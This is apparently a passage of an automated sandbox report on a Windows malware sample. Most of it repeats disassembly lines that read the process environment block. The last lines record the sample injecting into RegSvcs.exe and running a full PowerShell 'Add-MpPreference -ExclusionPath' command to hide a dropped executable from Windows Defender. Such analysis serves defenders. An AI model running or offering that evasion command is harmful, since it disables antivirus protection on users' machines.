                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014947FB mov eax, dword ptr fs:[00000030h]7_2_014947FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153678E mov eax, dword ptr fs:[00000030h]7_2_0153678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014907AF mov eax, dword ptr fs:[00000030h]7_2_014907AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015447A0 mov eax, dword ptr fs:[00000030h]7_2_015447A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014AC640 mov eax, dword ptr fs:[00000030h]7_2_014AC640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CA660 mov eax, dword ptr fs:[00000030h]7_2_014CA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CA660 mov eax, dword ptr fs:[00000030h]7_2_014CA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C2674 mov eax, dword ptr fs:[00000030h]7_2_014C2674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155866E mov eax, dword ptr fs:[00000030h]7_2_0155866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155866E mov eax, dword ptr fs:[00000030h]7_2_0155866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A260B mov eax, dword ptr fs:[00000030h]7_2_014A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A260B mov eax, dword ptr fs:[00000030h]7_2_014A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A260B mov eax, dword ptr fs:[00000030h]7_2_014A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A260B mov eax, dword ptr fs:[00000030h]7_2_014A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A260B mov eax, dword ptr fs:[00000030h]7_2_014A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A260B mov eax, dword ptr fs:[00000030h]7_2_014A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A260B mov eax, dword ptr fs:[00000030h]7_2_014A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2619 mov eax, dword ptr fs:[00000030h]7_2_014D2619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150E609 mov eax, dword ptr fs:[00000030h]7_2_0150E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149262C mov eax, dword ptr fs:[00000030h]7_2_0149262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C6620 mov eax, dword ptr fs:[00000030h]7_2_014C6620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014C8620 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014AE627 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014CA6C7 mov ebx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014CA6C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_015106F1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_015106F1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150E6F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150E6F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150E6F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150E6F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01494690 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01494690 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014CC6A6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014C66B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01564940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01510946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014D096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014D096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014D096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014B6962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014B6962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014B6962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01534978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01534978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151C97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151C912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01488918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01488918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150E908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150E908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0152892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0155A9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_015269C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0149A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0149A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0149A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0149A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0149A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0149A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014C49D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151E9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014C29F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014C29F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_015189B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_015189B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_015189B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014909AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014909AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A2840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01494859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01494859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014C0854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01526870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01526870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151E872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151E872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151C810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153483A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153483A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014CA830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014B2835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014B2835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014B2835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014B2835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014B2835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014B2835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014BE8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_015608C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0155A8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014CC8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014CC8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151C89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01490887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01562B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01562B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01562B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01562B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153EB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01538B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01526B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01526B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0155AB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01488B50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01544B4B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01544B4B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0148CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150EB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150EB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150EB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150EB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150EB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150EB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150EB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150EB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150EB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01564B00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014BEB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014BEB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01558B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01558B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014B0BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014B0BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014B0BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153EBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01490BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01490BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01490BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151CBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014BEBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01498BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01498BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01498BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01544BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01544BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A0BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A0BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A0A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A0A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01496A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01496A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01496A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01496A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01496A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01496A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01496A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150CA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150CA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014CCA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014CCA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014CCA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153EA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151CA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014BEA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014CCA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014CCA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014B4A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014B4A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014E6ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014E6ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014E6ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01490AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014C4AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014C4AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014CAAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014CAAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0149EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0149EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0149EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0149EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0149EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GDhinOc.exe"
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtResumeThread: Direct from: 0x773836AC
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtMapViewOfSection: Direct from: 0x77382D1C
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe NtWriteVirtualMemory: Direct from: 0x77382E3C
